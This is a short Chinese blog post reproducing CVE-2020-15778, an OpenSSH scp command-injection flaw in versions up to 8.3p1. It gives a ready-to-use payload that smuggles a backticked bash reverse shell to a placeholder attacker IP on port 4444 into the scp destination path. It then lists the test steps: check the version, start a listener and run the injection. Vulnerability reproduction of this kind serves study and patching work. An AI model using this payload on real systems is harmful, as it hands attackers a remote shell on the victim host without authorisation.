欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CVE-2020-15778漏洞复现

程序员文章站 2022-03-24 10:45:18
...
产品:Openssh

影响的组件:SCP

漏洞版本:<= openssh-8.3p1

scp命令引发的命令注入

反弹shell的payload

scp 1.txt aaa@qq.com受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'

实战测试,这里使用本机进行测试

1、查看ssh版本,符合漏洞版本

ssh -V

CVE-2020-15778漏洞复现

2、先在本地新建好文件,用于上传

CVE-2020-15778漏洞复现

2、本地开启监听

CVE-2020-15778漏洞复现

3、使用scp命令注入成功反弹shell

CVE-2020-15778漏洞复现

CVE-2020-15778漏洞复现

 

参考文章:

https://github.com/cpandya2909/CVE-2020-15778/#vulnerability-title-scp-in-openssh-83p1-allows-eval-injection

相关标签: cve

上一篇: IIS反向代理设置

下一篇: 【CVE】CVE-2020-13935:Tomcat 拒绝服务漏洞

推荐阅读